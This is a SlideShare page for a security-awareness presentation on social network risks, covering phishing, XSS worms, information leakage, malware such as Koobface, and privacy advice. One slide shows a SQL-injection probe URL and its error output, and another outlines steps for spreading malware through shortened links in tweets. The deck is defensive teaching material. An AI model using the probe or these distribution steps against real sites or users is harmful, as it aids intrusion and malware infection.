SlideShare uma empresa Scribd logo

Social networks security risks

O
osuhaibany
Tecnologia
1 de 47
SECURITY & 1 PRIVACY ON SOCIAL NETWORKS Omar M Alsuhaibany CISSP, GCFA, ISO 27001 LA
It’s not only about Facebook :) 2
Before Social Networks 3 Social Networks
A Social Networks definition 4  Defines itself  on Wiki: A social network is a social structure made up of individuals (or organizations) called "nodes", which are tied (connected) by one or more specific types of interdependency, such as friendship, kinship, common interest, financial exchange, dislike, or relationships of beliefs, knowledge or prestige.
Examples of Social Networks? 5  Facebook  LinkedIn  Twitter Even more media:  RSS Feeds  Blogs  Wikis  Web Chat  Podcasts  Mashups  Photo/Video-sharing  Virtual Worlds
Common Web 2.0 6 Vulnerabilities  Phishing  Spam  Malwares  Cross Site Scripting  SQL Injection  Authentication and Authorization Flaws  Information Leakage  Insecure Storage  Insecure Communications
Some Web 2.0 Specific 7 Vulnerabilities  On top of that list we do have some specific Web 2.0 vulnerabilities:  XSS Worms  Feed Injections  Mashup and Widget Hacks
Well First thing first: 8 Passwords!!!  Is it new thing? No, however its different.  Password sloth. Using the same password on several sites is like trusting the weakest link in a chain to carry the same weight.  Use same password as your email when the login username is your email!!  According to FB stats. More than 50% use the same password.  Avoid using the same password on multiple sites  Do not synchronize account information with organization login credentials.
Phishing 9
Phishing 10 cont’d
Phishing 11 cont’d  Major phishing attempts  Simple "look at this" message  Users directed to fbstarter.com, fbaction.net  Phished credentials used to automatically log in, send more mail  Some users report passwords changed  Phishtank reports Facebook 7th most common target  Behind only banks, PayPal eBay  "Socail Phishing" is far more effective
Phishing 12 cont’d  72% successful in controlled study  No TLS for login page  No Anti-phishing measures  Frequent genuine emails with login links  Users don't consider social networks' passwords as valuable  Web 2.0 sites encourage password sharing…  Facebook is doing a good job but still!
Phishing 13 cont’d
Phishing 14 cont’d
Spam 15  Spam is not only for spamming purposes! Although annoying.  All new types: followers, friend requests, fake accounts
Spam 16 cont’d  Fighting the Spam  Automatically detect spammer profiles:  analyze link history  analyze graph structure  analyze profile  Aggressivelyrequest CAPTCHAs  Users feedback  Classifiers  Stringblocking  Hashing  Machine Learning
Cross Site Scripting (XSS) 17  New to Web 2.0? No  Is this worse in Web 2.0? Yes  XSS flaws occur whenever an application takes user supplied data and sends it to a web browser without first validating or encoding that content.
XSS Worms 18  New to Web 2.0? Yes  Self propagating XSS code injected into a web application which will spread when users visits a page.  First XSS worm, 4 years ago spread through MySpace  1 million+ infections in 24 hours
Feed Injections 19  New to Web 2.0? Yes  Feed aggregators have data coming from various untrusted sources. The data being received can be malicious and exploit users.  Remote Zone Risks  Web browsers or web based readers in this category  Attacks such as XSS and CSRF possible
Mashup and Widget 20  New to Web 2.0? Yes Mashups and Widgets are core components in Web 2.0 sites. The rich functionality they provide can be exploited by attackers through attacks such as XSS.
Mashup and Widget 21 cont’d  Mashups site is the middleman, do you trust it?  Multiple inputs, one output  Mashup communications could leak data  Mashups require cross domain access.
Mashup and Widget 22 cont’d
Information Leakage 23  New to Web 2.0? No  Is this worse in Web 2.0? Yes Applications can unintentionally leak information about their configuration, internal workings, or violate privacy through a variety of application problems.
Information Leakage 24 cont’d  A simple lack of error handling leaking information  http://www.examplesite.com/home.html?day=Mon dayDrivers(0x80040E14)  I add a little something onto the URL  http://www.examplesite.com/home.html?day=Mon day AND userscolumn=2  No error handling = information leakage Microsoft OLE DB Provider for ODBC Drivers(0x80040E14) [Microsoft][ODBC SQL Server Driver][SQL Server]Invalid column name/examplesite/login.asp, line 10
Information Leakage 25 cont’d  What makes this worse in Web 2.0?  Business logic and validation moved to the client side  Web 2.0 apps will do a lot of work on the client side  Validation of data, business logic and sensitive data  You need to back these up with server side checks  Never assume sensitive data will be safe client
Authentication and Authorization Flaws 26  New to Web 2.0? No  Is this worse in Web 2.0? Yes These flaws can lead to the hijacking of user or accounts, privilege escalation, undermine authorization and accountability controls, and cause privacy violations.
Authentication and Authorization Flaws 27 cont’d  Authentication and Authorization Weaknesses  Passwords with no max age, reasonable lengths and complexity  Lack of brute force protection  Broken CAPTCHA systems  Security through obscurity  Session Management Weaknesses  Lack of sufficient entropy in session ID’s  Predictable session ID’s  Lack of sufficient timeouts and maximum lifetimes for ID’s  Using one session ID for the whole session
Authentication and Authorization Flaws 28 cont’d  What makes this worse in Web 2.0?  CAPTCHA’s used to provide strong A+A but are often weak  More access points in Web 2.0 applications  The use of single sign on leads to single point of failure  Growth in other attacks further undermines A+A
Insecure Storage and Communications 29  New to Web 2.0? No  Is this worse in Web 2.0? Yes These flaws could allow sensitive data to be stolen if the appropriate strong protections aren’t in place.
Insecure Storage and Communications 30 cont’d  Insecure storage of data  Not encrypting sensitive data  Hard coding of keys and/or insecurely storing keys  Using broken protection mechanisms (i.e. DES)  Failing to rotate and manage encryption keys  Insecure communications  Not encrypting sensitive data in transit  Only using SSL/TLS for the initial logon request  Failing to protect keys whilst in transit  Emailing clear text passwords
Insecure Storage and Communications 31 cont’d  What makes this worse in Web 2.0?  More data in more places, including client side storage  Mixing secure and insecure content on a page  And now with the Cloud!!!
Browsing Habits and Experience 32 have Changed…  Trigger finger (clicking on everything). Inboxes contain everything from drink requests to cause requests, do not get into the click habit unless you are ready to deal with drive-by downloads and zero-day attacks.
A little on Privacy … 33  3rd Party Apps on Facebook  Anyone can create a Facebook app  Many of the agreement you must accept gives the company the right to monitor your data and sell it without informing you.  Tracker information can be built into any application.  Mixing personal with professional; Commonly on Facebook, where one’s friends included business associates, family members and friends.  Engaging in Tweet (or Facebook/LinkedIn/Myspace) rage. Imagine you are at a party where everyone is listening, including your boss, spouse and future employer.
Privacy 34 cont’d
Privacy 35 cont’d
Data = $$$ 36  Steal your money directly  Sell your data  Trick your friends and family into supplying personal data  Sell your identity  Use your accounts to spread spam, malware and more data theft scams  Sell your organization's data or sensitive information  Blackmail individuals and organizations
URL Shortners Risks 37  bit.ly, hex.io, zi.ma …etc  Where the URL will take you?  dubious link via email? Hover your mouse or check the HTML  A new way for email Phishing scams  DDOS with iframe  Easily escaping spam filters  Even more dangerous! what if the site got hacked?  “See before you click” functionality or extensions  Example: j.mp
Malware example: Koobface 38  The Koobface worm and its associated botnet have gained notoriety in security circles for its longevity and history of targeting social networking sites. First surfacing in 2008 within MySpace and Facebook, the worm resurfaced in early 2009, this time targeting Twitter users.  By using Phishing techniques, the message directs the recipients to a third- party website, where they are prompted to download what is purported to be an update of the Adobe Flash player.  11/10/2009 - As part of a new Koobface attack, links to Google Reader URLs controlled by cyber-criminals are being spammed by Koobface onto social network sites, including Facebook and MySpace. The hundreds of Google accounts involved host a page with a fake YouTube video. Attempts to view this supposed video expose Windows users to infection by Koobface.  Koobface ultimately attempts, upon successful infection, to gather sensitive information from the victims such as credit card numbers.
Facebook Widget Installing 39 Spyware  Prompts users to install the infamous "Zango" adware/spyware.
Twitter hacking example: 40  Select victim group using any one of a number of Twitter trend tools.  Select malware based on device or location info.  Upload malware to dropbox.com and request a public link for the uploaded file.  Use a URL shortening service to obfuscate the URL.  Send tweet to target referencing information or post with keywords so that all individuals “tracking” the keywords will be notified of a new tweet on the subject they are tracking.
Scareware Tweets 41  Scareware is fake anti-virus – instead of protecting your computer it infects it  Scammers create multiple tweets that direct you to a scareware page. They then try to frighten you into believing you have a security problem and need their software to address it  Other scareware attacks aim to:  Take control of your computer to send spam  Hold your computer to ransom  Result: Malware infection
Security analysis difficulties 42 with Web 2.0  More code and complexity in Web 2.0 apps  At least two languages to analyze (client and server)  User supplied code might never be reviewed  Dynamic nature increases risk of missing flaws  Increased amount of input points
Basics of Social Networking 43 Security  Never Post Personal Information Online  Everything you post is public information  If you don’t feel comfortable with everyone seeing it, then don’t put it online  Configure security settings on all sites  Most websites you log into have security configurations  Set the privacy levels in accordance to what you are posting  Change your Password Regularly  Use Phrases, not words  Do not keep a “Master” password  Never Trust E-mails asking for personal information  An official organization will never ask you to disclose any private information in order to correct a error
Basics of Social Networking Security 44 cont’d  Do not friend anyone you do not know and trust  Hackers and spammers are more clever then you think. There is a reason many online scams are called “Social engineering”  Clean out your friend list regularly  Watch For Hacked Friend Accounts  Unusual posts or requests  Posting “Shock Sites”  Beware of Third Party Apps  Many require you to sign a agreement giving them the right to sell your information  Malicious code can be written in the program  Delete unused Apps  If you are not using them, then why let them potentially mine data about you?  If you are unsure a app or a post or anything, then Google is your best friend
Basics of Social Networking Security 45 cont’d  Caution about posting your location online  People are watching you where you will be and more importantly where you will not be  Check your security settings monthly  Facebook sets all profiles to public with each site redesign  Apps may disable your security settings  Viruses and Malware may disable your security settings  Consider using Private Browsing  Private Browsing allows you to view websites without storing your history or installing cookies  Private Browsing Shortcuts:  Firefox – Ctrl + Shift + P  Internet Explore 8 – Ctrl + Shift + P  Opera – Ctrl + Shift + N  Google Chrome – Ctrl+Shift+N  Don’t stay logged on
Basics of Social Networking Security 46 cont’d  Set your settings to high privacy and/or enable security settings on the sites you use.  Review a given Website’s privacy policy, you may be surprised on what you are actually agreeing to.  Log off when you leave.  Install and update antivirus software.  Keep system software AND applications up to date.  Make sure the connection you use is secure.
? ? ? ? ? ? ? ? ? ?

Recomendados

A Guide to Internet Security For Businesses- Business.com
A Guide to Internet Security For Businesses- Business.comA Guide to Internet Security For Businesses- Business.com
A Guide to Internet Security For Businesses- Business.com
Business.com
 
Social networking-website-security-mitigation
Social networking-website-security-mitigationSocial networking-website-security-mitigation
Social networking-website-security-mitigation
bipinsunar
 
100812 internet security2.0
100812 internet security2.0100812 internet security2.0
100812 internet security2.0
dkp205
 
Protecting Corporete Credentials Against Threats 4 48159 wgw03071_usen
Protecting Corporete Credentials Against Threats 4 48159 wgw03071_usenProtecting Corporete Credentials Against Threats 4 48159 wgw03071_usen
Protecting Corporete Credentials Against Threats 4 48159 wgw03071_usen
CMR WORLD TECH
 
The Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security ProvidersThe Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security Providers
United Security Providers AG
 
Exploring And Investigating New Dimensions In Phishing
Exploring And Investigating New Dimensions In PhishingExploring And Investigating New Dimensions In Phishing
Exploring And Investigating New Dimensions In Phishing
Muhammad Haroon CISM PCI QSA ISMS LA CPTS CEH
 
How To Catch a Phish: User Awareness and Training
How To Catch a Phish: User Awareness and TrainingHow To Catch a Phish: User Awareness and Training
How To Catch a Phish: User Awareness and Training
London School of Cyber Security
 
Security Primer
Security PrimerSecurity Primer
Security Primer
Alison Gianotto
 

Recomendados

A Guide to Internet Security For Businesses- Business.com
A Guide to Internet Security For Businesses- Business.comA Guide to Internet Security For Businesses- Business.com
A Guide to Internet Security For Businesses- Business.com
Business.com
 
Social networking-website-security-mitigation
Social networking-website-security-mitigationSocial networking-website-security-mitigation
Social networking-website-security-mitigation
bipinsunar
 
100812 internet security2.0
100812 internet security2.0100812 internet security2.0
100812 internet security2.0
dkp205
 
Protecting Corporete Credentials Against Threats 4 48159 wgw03071_usen
Protecting Corporete Credentials Against Threats 4 48159 wgw03071_usenProtecting Corporete Credentials Against Threats 4 48159 wgw03071_usen
Protecting Corporete Credentials Against Threats 4 48159 wgw03071_usen
CMR WORLD TECH
 
The Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security ProvidersThe Whys and Wherefores of Web Security – by United Security Providers
The Whys and Wherefores of Web Security – by United Security Providers
United Security Providers AG
 
Exploring And Investigating New Dimensions In Phishing
Exploring And Investigating New Dimensions In PhishingExploring And Investigating New Dimensions In Phishing
Exploring And Investigating New Dimensions In Phishing
Muhammad Haroon CISM PCI QSA ISMS LA CPTS CEH
 
How To Catch a Phish: User Awareness and Training
How To Catch a Phish: User Awareness and TrainingHow To Catch a Phish: User Awareness and Training
How To Catch a Phish: User Awareness and Training
London School of Cyber Security
 
Security Primer
Security PrimerSecurity Primer
Security Primer
Alison Gianotto
 
Does facebook federation have your best interests at heart
Does facebook federation have your best interests at heartDoes facebook federation have your best interests at heart
Does facebook federation have your best interests at heart
PerfectCloud Corp.
 
IRJET - Detecting Spiteful Accounts in Social Network
IRJET - Detecting Spiteful Accounts in Social NetworkIRJET - Detecting Spiteful Accounts in Social Network
IRJET - Detecting Spiteful Accounts in Social Network
IRJET Journal
 
Grift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a rideGrift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a ride
Roen Branham
 
14 cyber threats
14 cyber threats14 cyber threats
14 cyber threats
mahesh43211
 
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
WhoisXML API
 
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
MZERMA Amine
 
Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsStudy on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing Tools
IRJET Journal
 
OlgerHoxha_Thesis_Final
OlgerHoxha_Thesis_FinalOlgerHoxha_Thesis_Final
OlgerHoxha_Thesis_Final
Olger Hoxha, CISSP CISM
 
Facebook
FacebookFacebook
Facebook
Steph Cliche
 
Insecure trends in web technologies 2009
Insecure trends in web technologies 2009Insecure trends in web technologies 2009
Insecure trends in web technologies 2009
Chandrakanth Narreddy
 
Facebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris AkkayaFacebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris Akkaya
Umut Baris Akkaya
 
External threats to information system: Malicious software and computer crimes
External threats to information system: Malicious software and computer crimesExternal threats to information system: Malicious software and computer crimes
External threats to information system: Malicious software and computer crimes
Souman Guha
 
What is the Cybersecurity plan for tomorrow?
What is the Cybersecurity plan for tomorrow?What is the Cybersecurity plan for tomorrow?
What is the Cybersecurity plan for tomorrow?
Samvel Gevorgyan
 
Cybercrime - An essential guide from Thawte
Cybercrime - An essential guide from ThawteCybercrime - An essential guide from Thawte
Cybercrime - An essential guide from Thawte
RapidSSLOnline.com
 
Top 15 security predictions for 2017
Top 15 security predictions for 2017Top 15 security predictions for 2017
Top 15 security predictions for 2017
Accelerate Tech
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
AM Publications,India
 
Presentation for class
Presentation for classPresentation for class
Presentation for class
Jeannine Hamilton
 
Enabling a Zero Trust strategy for SMS
Enabling a Zero Trust strategy for SMSEnabling a Zero Trust strategy for SMS
Enabling a Zero Trust strategy for SMS
Paul Walsh
 
Phishing detection in ims using domain ontology and cba an innovative rule ...
Phishing detection in ims using domain ontology and cba an innovative rule ...Phishing detection in ims using domain ontology and cba an innovative rule ...
Phishing detection in ims using domain ontology and cba an innovative rule ...
ijistjournal
 
Top 5 Cybersecurity Risks in Banking
Top 5 Cybersecurity Risks in BankingTop 5 Cybersecurity Risks in Banking
Top 5 Cybersecurity Risks in Banking
Seqrite
 
Introduction to cryptography
Introduction to cryptographyIntroduction to cryptography
Introduction to cryptography
Amir Neziri
 
Social Networks and Security: What Your Teenager Likely Won't Tell You
Social Networks and Security: What Your Teenager Likely Won't Tell YouSocial Networks and Security: What Your Teenager Likely Won't Tell You
Social Networks and Security: What Your Teenager Likely Won't Tell You
Denim Group
 

Mais conteúdo relacionado

Mais procurados

Grift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a rideGrift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a ride
Roen Branham
 
Facebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris AkkayaFacebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris Akkaya
Umut Baris Akkaya
 
External threats to information system: Malicious software and computer crimes
External threats to information system: Malicious software and computer crimesExternal threats to information system: Malicious software and computer crimes
External threats to information system: Malicious software and computer crimes
Souman Guha
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
AM Publications,India
 
Phishing detection in ims using domain ontology and cba an innovative rule ...
Phishing detection in ims using domain ontology and cba an innovative rule ...Phishing detection in ims using domain ontology and cba an innovative rule ...
Phishing detection in ims using domain ontology and cba an innovative rule ...
ijistjournal
 

Mais procurados (20)

Does facebook federation have your best interests at heart
Does facebook federation have your best interests at heartDoes facebook federation have your best interests at heart
Does facebook federation have your best interests at heart
 
IRJET - Detecting Spiteful Accounts in Social Network
IRJET - Detecting Spiteful Accounts in Social NetworkIRJET - Detecting Spiteful Accounts in Social Network
IRJET - Detecting Spiteful Accounts in Social Network
 
Grift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a rideGrift horse money stealing trojan takes 10m android users for a ride
Grift horse money stealing trojan takes 10m android users for a ride
 
14 cyber threats
14 cyber threats14 cyber threats
14 cyber threats
 
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
Online Brand Protection: Fighting Domain Name Typosquatting, Website Spoofing...
 
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
Symantec & WSJ PRESENTS "MALWARE on Main Street" ...
 
Study on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing ToolsStudy on Phishing Attacks and Antiphishing Tools
Study on Phishing Attacks and Antiphishing Tools
 
OlgerHoxha_Thesis_Final
OlgerHoxha_Thesis_FinalOlgerHoxha_Thesis_Final
OlgerHoxha_Thesis_Final
 
Facebook
FacebookFacebook
Facebook
 
Insecure trends in web technologies 2009
Insecure trends in web technologies 2009Insecure trends in web technologies 2009
Insecure trends in web technologies 2009
 
Facebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris AkkayaFacebook Security Essay - Umut Baris Akkaya
Facebook Security Essay - Umut Baris Akkaya
 
External threats to information system: Malicious software and computer crimes
External threats to information system: Malicious software and computer crimesExternal threats to information system: Malicious software and computer crimes
External threats to information system: Malicious software and computer crimes
 
What is the Cybersecurity plan for tomorrow?
What is the Cybersecurity plan for tomorrow?What is the Cybersecurity plan for tomorrow?
What is the Cybersecurity plan for tomorrow?
 
Cybercrime - An essential guide from Thawte
Cybercrime - An essential guide from ThawteCybercrime - An essential guide from Thawte
Cybercrime - An essential guide from Thawte
 
Top 15 security predictions for 2017
Top 15 security predictions for 2017Top 15 security predictions for 2017
Top 15 security predictions for 2017
 
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICESHOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
HOST PROTECTION USING PROCESS WHITE-LISTING, DECEPTION AND REPUTATION SERVICES
 
Presentation for class
Presentation for classPresentation for class
Presentation for class
 
Enabling a Zero Trust strategy for SMS
Enabling a Zero Trust strategy for SMSEnabling a Zero Trust strategy for SMS
Enabling a Zero Trust strategy for SMS
 
Phishing detection in ims using domain ontology and cba an innovative rule ...
Phishing detection in ims using domain ontology and cba an innovative rule ...Phishing detection in ims using domain ontology and cba an innovative rule ...
Phishing detection in ims using domain ontology and cba an innovative rule ...
 
Top 5 Cybersecurity Risks in Banking
Top 5 Cybersecurity Risks in BankingTop 5 Cybersecurity Risks in Banking
Top 5 Cybersecurity Risks in Banking
 

Destaque

Introduction to cryptography
Introduction to cryptographyIntroduction to cryptography
Introduction to cryptography
Amir Neziri
 
Building Social Networks
Building Social NetworksBuilding Social Networks
Building Social Networks
nyccamp
 
Data Visualization and Social Network Analysis for Recruiting.
Data Visualization and Social Network Analysis for Recruiting.Data Visualization and Social Network Analysis for Recruiting.
Data Visualization and Social Network Analysis for Recruiting.
Matt Charney
 
FITC - Bootstrap Unleashed
FITC - Bootstrap UnleashedFITC - Bootstrap Unleashed
FITC - Bootstrap Unleashed
Rami Sayar
 
Responsive Web Design - Introduction & Workflow Overview
Responsive Web Design - Introduction & Workflow OverviewResponsive Web Design - Introduction & Workflow Overview
Responsive Web Design - Introduction & Workflow Overview
Aidan Foster
 
Design of recommender systems
Design of recommender systemsDesign of recommender systems
Design of recommender systems
Rashmi Sinha
 

Destaque (20)

Introduction to cryptography
Introduction to cryptographyIntroduction to cryptography
Introduction to cryptography
 
Social Networks and Security: What Your Teenager Likely Won't Tell You
Social Networks and Security: What Your Teenager Likely Won't Tell YouSocial Networks and Security: What Your Teenager Likely Won't Tell You
Social Networks and Security: What Your Teenager Likely Won't Tell You
 
Building Social Networks
Building Social NetworksBuilding Social Networks
Building Social Networks
 
Data Visualization and Social Network Analysis for Recruiting.
Data Visualization and Social Network Analysis for Recruiting.Data Visualization and Social Network Analysis for Recruiting.
Data Visualization and Social Network Analysis for Recruiting.
 
Introduction to Cryptography Part I
Introduction to Cryptography Part IIntroduction to Cryptography Part I
Introduction to Cryptography Part I
 
FITC - Bootstrap Unleashed
FITC - Bootstrap UnleashedFITC - Bootstrap Unleashed
FITC - Bootstrap Unleashed
 
(Practical) Beyond Responsive Web Design (WordCamp Miami 2011)
(Practical) Beyond Responsive Web Design (WordCamp Miami 2011)(Practical) Beyond Responsive Web Design (WordCamp Miami 2011)
(Practical) Beyond Responsive Web Design (WordCamp Miami 2011)
 
Social journalism: Community building through social networks
Social journalism: Community building through social networksSocial journalism: Community building through social networks
Social journalism: Community building through social networks
 
Responsive Web Design - Introduction & Workflow Overview
Responsive Web Design - Introduction & Workflow OverviewResponsive Web Design - Introduction & Workflow Overview
Responsive Web Design - Introduction & Workflow Overview
 
Introduction to Cryptography Parts II and III
Introduction to Cryptography Parts II and IIIIntroduction to Cryptography Parts II and III
Introduction to Cryptography Parts II and III
 
Presentacion diapositiva 40
Presentacion diapositiva 40Presentacion diapositiva 40
Presentacion diapositiva 40
 
Introduction to Cryptography
Introduction to CryptographyIntroduction to Cryptography
Introduction to Cryptography
 
Responsive Web Design
Responsive Web DesignResponsive Web Design
Responsive Web Design
 
Introduction to Cryptography
Introduction to CryptographyIntroduction to Cryptography
Introduction to Cryptography
 
ESSIR 2013 Recommender Systems tutorial
ESSIR 2013 Recommender Systems tutorial ESSIR 2013 Recommender Systems tutorial
ESSIR 2013 Recommender Systems tutorial
 
Responsive Web Design Basics
Responsive Web Design BasicsResponsive Web Design Basics
Responsive Web Design Basics
 
Introduction to Cryptography
Introduction to CryptographyIntroduction to Cryptography
Introduction to Cryptography
 
Design of recommender systems
Design of recommender systemsDesign of recommender systems
Design of recommender systems
 
Visual cryptography1
Visual cryptography1Visual cryptography1
Visual cryptography1
 
Building Recommendation Systems on Social Data @KTH - FutureFriday - March 2014
Building Recommendation Systems on Social Data @KTH - FutureFriday - March 2014Building Recommendation Systems on Social Data @KTH - FutureFriday - March 2014
Building Recommendation Systems on Social Data @KTH - FutureFriday - March 2014
 

Semelhante a Social networks security risks

Sip 140208055023-phpapp02
Sip 140208055023-phpapp02Sip 140208055023-phpapp02
Sip 140208055023-phpapp02
mark scott
 
USG_Security_Awareness_Primer.pptx
USG_Security_Awareness_Primer.pptxUSG_Security_Awareness_Primer.pptx
USG_Security_Awareness_Primer.pptx
BilmyRikas
 
USG_Security_Awareness_Primer.pptx
USG_Security_Awareness_Primer.pptxUSG_Security_Awareness_Primer.pptx
USG_Security_Awareness_Primer.pptx
sumita02
 
Challenges and Risks of Web 3.0 — A New Digital World Order
Challenges and Risks of Web 3.0 — A New Digital World OrderChallenges and Risks of Web 3.0 — A New Digital World Order
Challenges and Risks of Web 3.0 — A New Digital World Order
Mindfire LLC
 

Semelhante a Social networks security risks (20)

Social Media Security
Social Media SecuritySocial Media Security
Social Media Security
 
Ethical Hacking and Cyber Security
Ethical Hacking and Cyber SecurityEthical Hacking and Cyber Security
Ethical Hacking and Cyber Security
 
Sip 140208055023-phpapp02
Sip 140208055023-phpapp02Sip 140208055023-phpapp02
Sip 140208055023-phpapp02
 
Cyber Security
Cyber SecurityCyber Security
Cyber Security
 
You are the weakest link
You are the weakest linkYou are the weakest link
You are the weakest link
 
Awareness Security 123.pptx
Awareness Security 123.pptxAwareness Security 123.pptx
Awareness Security 123.pptx
 
USG_Security_Awareness_Primer.pptx
USG_Security_Awareness_Primer.pptxUSG_Security_Awareness_Primer.pptx
USG_Security_Awareness_Primer.pptx
 
USG_Security_Awareness_Primer (1).pptx
USG_Security_Awareness_Primer (1).pptxUSG_Security_Awareness_Primer (1).pptx
USG_Security_Awareness_Primer (1).pptx
 
USG_Security_Awareness_Primer.pptx
USG_Security_Awareness_Primer.pptxUSG_Security_Awareness_Primer.pptx
USG_Security_Awareness_Primer.pptx
 
Security_Awareness_Primer.pptx
Security_Awareness_Primer.pptxSecurity_Awareness_Primer.pptx
Security_Awareness_Primer.pptx
 
Cybersecurity-NSIC.pdf
Cybersecurity-NSIC.pdfCybersecurity-NSIC.pdf
Cybersecurity-NSIC.pdf
 
Cyber Crime and Security
Cyber Crime and SecurityCyber Crime and Security
Cyber Crime and Security
 
Web server security challenges
Web server security challengesWeb server security challenges
Web server security challenges
 
Common Security Issues on the Internet
Common Security Issues on the InternetCommon Security Issues on the Internet
Common Security Issues on the Internet
 
Phishing
PhishingPhishing
Phishing
 
Challenges and Risks of Web 3.0 — A New Digital World Order
Challenges and Risks of Web 3.0 — A New Digital World OrderChallenges and Risks of Web 3.0 — A New Digital World Order
Challenges and Risks of Web 3.0 — A New Digital World Order
 
ccs12-18022310494mghmgmyy3 (1).pdf
ccs12-18022310494mghmgmyy3 (1).pdfccs12-18022310494mghmgmyy3 (1).pdf
ccs12-18022310494mghmgmyy3 (1).pdf
 
Are you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weaponsAre you fighting_new_threats_with_old_weapons
Are you fighting_new_threats_with_old_weapons
 
Global Technologies and Risks Trends
Global Technologies and Risks TrendsGlobal Technologies and Risks Trends
Global Technologies and Risks Trends
 
Intro phishing
Intro phishingIntro phishing
Intro phishing
 

Último

Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
vu2urc
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc
 
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot TakeoffStrategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
Strategize a Smooth Tenant-to-tenant Migration and Copilot Takeoff
sammart93
 
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdfUnderstanding Discord NSFW Servers A Guide for Responsible Users.pdf
Understanding Discord NSFW Servers A Guide for Responsible Users.pdf
UK Journal
 

Último (20)

Boost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdfBoost Fertility New Invention Ups Success Rates.pdf
Boost Fertility New Invention Ups Success Rates.pdf
 
Advantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your BusinessAdvantages of Hiring UIUX Design Service Providers for Your Business
Advantages of Hiring UIUX Design Service Providers for Your Business
 
HTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation StrategiesHTML Injection Attacks: Impact and Mitigation Strategies
HTML Injection Attacks: Impact and Mitigation Strategies
 
Histor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slideHistor y of HAM Radio presentation slide
Histor y of HAM Radio presentation slide
 
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
Connector Corner: Accelerate revenue generation using UiPath API-centric busi...
 
Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024Partners Life - Insurer Innovation Award 2024
Partners Life - Insurer Innovation Award 2024
 
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, AdobeApidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
Apidays New York 2024 - Scaling API-first by Ian Reasor and Radu Cotescu, Adobe
 
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data DiscoveryTrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
TrustArc Webinar - Unlock the Power of AI-Driven Data Discovery
 
GenCyber Cyber Security Day Presentation
